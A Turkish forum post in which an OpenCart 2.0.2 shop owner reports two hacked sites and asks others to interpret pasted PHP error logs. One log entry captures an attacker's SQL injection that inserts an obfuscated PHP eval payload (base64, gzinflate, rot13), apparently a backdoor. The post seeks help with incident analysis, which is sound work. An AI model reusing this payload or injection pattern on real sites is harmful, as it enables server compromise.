Merhabalar, 2 farklı web sitem 1 hafta içerisinde hacklendi. Opencart konusunda ok fazla bilgim yok ve bu güvenlik açıklarının nereden kaynaklandığını anlamaya çalışıyorum. İlk hacklenen web sitesini hızlı bir şekilde eski haline aldığım için inceleme fırsatım olmamaıştı. Bugün diğer e-ticaret sitem hacklenmiş. Acele etmeden inceledim ve hata kodlarında aşağıdaki kaynaklara ulaştım. Opencart sürümüm 2.0.2'dir. Konuyla alakalı tecrübeli arkadaşların tavsiyelerini bekliyorum.

Bu hata kayıtlarından ne çıkarılabilir sizce?

2018-07-08 18:22:06 - PHP Notice:  Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'a.sql kodlar  :
SELECT '<?php eval (gzinflate(base64_decode(str_rot13("ML/EF8Z' at line 1<br />Error No: 1064<br />a.sql kodlar  :
SELECT '<?php eval (gzinflate(base64_decode(str_rot13("ML/EF8ZjRZnsUrk/hVMOJaQZS19pZ3kkVNtX06qEFgnxAct0bH2RGin/zljgT/c2q9
/iih+BI40TaSguWq98TXxc4k0pOiufqT+K7WvibboK8kxCfTyZ6IddrWcAV5mKhyANXlg0FkNPkJ2wTHUTrlQtoJHUjjyFGycunTqKtI8lnvzPLRJ
DT6ZEPUoIKJWkYyewYRFaJxt+epn6S0qs39+umDuTfsEJnSmd3HRWTkCv/WgX54K4g98833KBSUHXv/Ygqsr+k4USOENPRjxM/ZkaAk56eYDM0xJ5
sK552h1khNHKr2lIXpZOhYvSs2VHZh8O8oKbPibYUutxFLYKpCY2KCo8Y7ByDy6D0l8=")))); ?>' FROM `mouwaffek_table` in /var/www/vhosts/xxx.com/httpdocs/system/library/db/mysqli.php on line 41
2018-07-08 23:35:17 - PHP Notice:  session_start(): ps_files_cleanup_dir: opendir(/var/lib/php/session) failed: Permission denied (13) in /var/www/vhosts/xxx.com/httpdocs/system/library/session.php on line 12
2018-07-08 23:38:09 - PHP Notice:  session_start(): ps_files_cleanup_dir: opendir(/var/lib/php/session) failed: Permission denied (13) in /var/www/vhosts/xxx.com/httpdocs/system/library/session.php on line 12